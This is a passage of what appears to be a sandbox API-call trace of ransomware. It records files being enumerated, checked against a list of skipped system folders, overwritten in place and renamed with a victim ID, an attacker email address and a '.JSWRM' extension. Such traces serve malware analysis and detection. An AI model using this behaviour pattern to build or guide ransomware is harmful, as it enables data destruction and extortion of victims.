returned 1 [0086.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0086.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.841] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.841] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187817.WMF", cAlternateFileName="")) returned 1 [0086.841] lstrcmpiW (lpString1="J0187817.WMF", lpString2=".") returned 1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="..") returned 1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="...") returned 1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="windows") returned -1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="recovery") returned -1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="perflogs") returned -1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="documents and settings") returned 1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="system volume information") returned -1 [0086.842] lstrcmpiW (lpString1="J0187817.WMF", lpString2="msocache") returned -1 [0086.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187817.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187817.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187817.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187817.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187817.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187817.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0086.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0086.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.842] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11644) returned 1 [0086.843] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24d210 [0086.843] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d70, lpOverlapped=0x0) returned 1 [0086.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.845] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d70, lpOverlapped=0x0) returned 1 [0086.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.845] CloseHandle (hObject=0x314) returned 1 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0086.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0086.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0086.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.845] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.846] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2870, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187819.WMF", cAlternateFileName="")) returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2=".") returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="..") returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="...") returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="windows") returned -1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="recovery") returned -1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="perflogs") returned -1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="documents and settings") returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="system volume information") returned -1 [0086.846] lstrcmpiW (lpString1="J0187819.WMF", lpString2="msocache") returned -1 [0086.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0086.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187819.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187819.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187819.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0086.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0086.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187819.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187819.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187819.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0086.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.847] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10352) returned 1 [0086.847] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2870) returned 0x24d210 [0086.847] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2870, lpOverlapped=0x0) returned 1 [0086.850] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.850] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2870, lpOverlapped=0x0) returned 1 [0086.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.850] CloseHandle (hObject=0x314) returned 1 [0086.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0086.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0086.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0086.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0086.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.857] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.858] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d4c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187825.WMF", cAlternateFileName="")) returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2=".") returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="..") returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="...") returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="windows") returned -1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="recovery") returned -1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="perflogs") returned -1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="documents and settings") returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="system volume information") returned -1 [0086.858] lstrcmpiW (lpString1="J0187825.WMF", lpString2="msocache") returned -1 [0086.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187825.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187825.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187825.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187825.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187825.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187825.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0086.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.859] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7500) returned 1 [0086.859] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d40) returned 0x205850 [0086.859] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d40, lpOverlapped=0x0) returned 1 [0086.864] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.864] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d40, lpOverlapped=0x0) returned 1 [0086.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.864] CloseHandle (hObject=0x314) returned 1 [0086.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0086.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0086.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0086.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.865] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.865] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.865] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, 